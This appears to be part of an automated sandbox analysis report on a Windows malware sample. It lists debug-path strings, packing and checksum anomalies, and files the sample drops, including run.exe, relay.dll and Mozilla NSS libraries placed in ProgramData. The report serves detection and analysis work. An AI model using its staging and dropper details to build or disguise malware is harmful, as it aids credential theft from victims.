                              Source: Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: nss3.pdb@ source: u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmp
                              Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021792267.0000020EEAA70000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: FC:\velup.pdb source: VucRf0jboS.exe, 00000000.00000002.2368707088.000000000421E000.00000004.00000020.00020000.00000000.sdmp, VucRf0jboS.exe, 00000000.00000000.1700705502.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024422327.0000020EEB3A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: wntdll.pdb source: run.exe, 00000003.00000002.1994925905.0000000003F6F000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000003.00000002.1995197239.0000000004779000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.1995035449.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324295539.000000000468E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2325072403.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2329148115.0000000003E60000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2330673814.0000000004313000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2327093725.0000000003B05000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524471270.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524115301.000000000488D000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: mozglue.pdb source: u5qk.0.exe, 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmp
                              Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000003.00000002.1992656537.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000003.00000000.1907137804.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000E.00000002.2294114402.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000E.00000000.2231681830.0000000000D3C000.00000002.00000001.01000000.00000009.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044464664.0000020EEBE00000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021461752.0000020EEAA30000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000003.00000002.1995525658.000000006C9F7000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 0000000E.00000002.2357108993.000000006C417000.00000002.00000001.01000000.0000000A.sdmp
                              Source: Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021663380.0000020EEAA60000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\velup.pdb source: VucRf0jboS.exe, 00000000.00000002.2368707088.000000000421E000.00000004.00000020.00020000.00000000.sdmp, VucRf0jboS.exe, 00000000.00000000.1700705502.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                              Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3045117994.0000020EEC0C0000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021509972.0000020EEAA40000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021555558.0000020EEAA50000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021509972.0000020EEAA40000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3030420251.0000020EEB7A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3034111147.0000020EEB9D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021555558.0000020EEAA50000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: C:\keyoy_nutanikitibaha.pdb source: VucRf0jboS.exe, 00000000.00000003.1758649321.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp, u5qk.0.exe, 00000001.00000000.1756183454.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: wntdll.pdbUGP source: run.exe, 00000003.00000002.1994925905.0000000003F6F000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000003.00000002.1995197239.0000000004779000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.1995035449.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2324295539.000000000468E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2325072403.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2329148115.0000000003E60000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2330673814.0000000004313000.00000004.00000001.00020000.00000000.sdmp, run.exe, 0000000E.00000002.2327093725.0000000003B05000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524471270.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2524115301.000000000488D000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3044688870.0000020EEC0A0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9001C000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3032814487.0000020EEB850000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E9007E000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: nss3.pdb source: u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmp
                              Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp
                              Source: VucRf0jboS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: VucRf0jboS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: VucRf0jboS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: VucRf0jboS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: VucRf0jboS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                              Data Obfuscation

                              barindex
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeUnpacked PE file: 1.2.u5qk.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeUnpacked PE file: 0.2.VucRf0jboS.exe.400000.0.unpack
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeUnpacked PE file: 1.2.u5qk.0.exe.400000.0.unpack
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00416240
                              Source: relay.dll.0.drStatic PE information: real checksum: 0x18dd31 should be: 0x1877ea
                              Source: ssfwvk.6.drStatic PE information: real checksum: 0x0 should be: 0xc411c
                              Source: tiktok[1].exe.1.drStatic PE information: real checksum: 0x0 should be: 0x8897e
                              Source: FBAKEHIEBK.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x8897e
                              Source: relay.dll.3.drStatic PE information: real checksum: 0x18dd31 should be: 0x1877ea
                              Source: nkho.15.drStatic PE information: real checksum: 0x0 should be: 0xc411c
                              Source: VucRf0jboS.exeStatic PE information: real checksum: 0x7b450 should be: 0x7b453
                              Source: u5qk.3.exe.0.drStatic PE information: section name: .didata
                              Source: freebl3.dll.1.drStatic PE information: section name: .00cfg
                              Source: freebl3[1].dll.1.drStatic PE information: section name: .00cfg
                              Source: mozglue.dll.1.drStatic PE information: section name: .00cfg
                              Source: mozglue[1].dll.1.drStatic PE information: section name: .00cfg
                              Source: msvcp140.dll.1.drStatic PE information: section name: .didat
                              Source: msvcp140[1].dll.1.drStatic PE information: section name: .didat
                              Source: nss3.dll.1.drStatic PE information: section name: .00cfg
                              Source: nss3[1].dll.1.drStatic PE information: section name: .00cfg
                              Source: softokn3.dll.1.drStatic PE information: section name: .00cfg
                              Source: softokn3[1].dll.1.drStatic PE information: section name: .00cfg
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0042786C push ecx; ret 0_2_0042787C
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0042780C push eax; ret 0_2_0042782A
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0042E3A5 push esi; ret 0_2_0042E3AE
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_00409D06 push ecx; ret 0_2_00409D19
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_004097B6 push ecx; ret 0_2_004097C9
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_04149F6D push ecx; ret 0_2_04149F80
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0415C9FD push esp; retf 0_2_0415C9FE
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_04149A1D push ecx; ret 0_2_04149A30
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_04167A73 push eax; ret 0_2_04167A91
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_04161B72 push dword ptr [esp+ecx-75h]; iretd 0_2_04161B76
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0415C3FF push esp; retf 0_2_0415C407
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_041E74D3 pushad ; retf 0_2_041E74D4
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_041E8568 push ecx; iretd 0_2_041E856E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_041E9D81 pushad ; retf 0_2_041E9D88
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_041EB7F3 push ebp; iretd 0_2_041EB826
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_041E9A6B push 2B991403h; ret 0_2_041E9A72
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_041EA391 push 00000061h; retf 0_2_041EA399
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_004176C5 push ecx; ret 1_2_004176D8
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BA8B536 push ecx; ret 1_2_6BA8B549
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00CFFAB6 push ecx; ret 3_2_00CFFAC9
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00CFFB55 push ecx; ret 3_2_00CFFB68
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00BB0F0B push 8B00D6D1h; retf 3_2_00BB0F10
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_6C9D47D9 push ecx; ret 3_2_6C9D47EC
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_6C9D6365 push ecx; ret 3_2_6C9D6378
                              Source: ssfwvk.6.drStatic PE information: section name: .text entropy: 6.816444465715168
                              Source: nkho.15.drStatic PE information: section name: .text entropy: 6.816444465715168
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile created: C:\Users\user\AppData\Local\Temp\u5qk.3.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeFile created: C:\Users\user\AppData\Roaming\SecureClient\relay.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exeJump to dropped file
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile created: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile created: C:\Users\user\AppData\Local\Temp\u5qk.2\relay.dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile created: C:\Users\user\AppData\Local\Temp\u5qk.0.exeJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
